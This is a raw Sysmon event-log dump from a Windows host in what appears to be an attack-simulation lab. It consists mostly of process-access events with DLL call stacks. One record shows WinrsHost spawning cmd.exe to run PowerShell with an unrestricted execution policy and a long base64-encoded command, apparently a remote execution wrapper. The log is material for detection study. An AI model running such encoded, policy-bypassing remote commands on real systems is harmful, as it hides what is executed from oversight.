08:42:01.151{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002749Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002748Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002747Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002746Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002745Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002744Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002743Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16D9-5F84-8200-000000007F01}4320C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002742Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16D9-5F84-8000-000000007F01}42364296C:\Windows\system32\WinrsHost.exe{5D479F2C-16D9-5F84-8200-000000007F01}4320C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x80000000000000002741Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.163{5D479F2C-16D9-5F84-8200-000000007F01}4320C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16D9-5F84-91E5-040000000000}0x4e5910HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16D9-5F84-8000-000000007F01}4236C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002740Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002739Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002738Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002737Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16A1-5F84-1400-000000007F01}13081952C:\Windows\system32\svchost.exe{5D479F2C-16D9-5F84-8000-000000007F01}4236C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16D9-5F84-8000-000000007F01}4236C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002735Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.136{5D479F2C-16D9-5F84-8100-000000007F01}42644268C:\Windows\system32\conhost.exe{5D479F2C-16D9-5F84-8000-000000007F01}4236C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002734Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16D9-5F84-8100-000000007F01}4264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002733Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002732Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002731Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002730Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002729Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 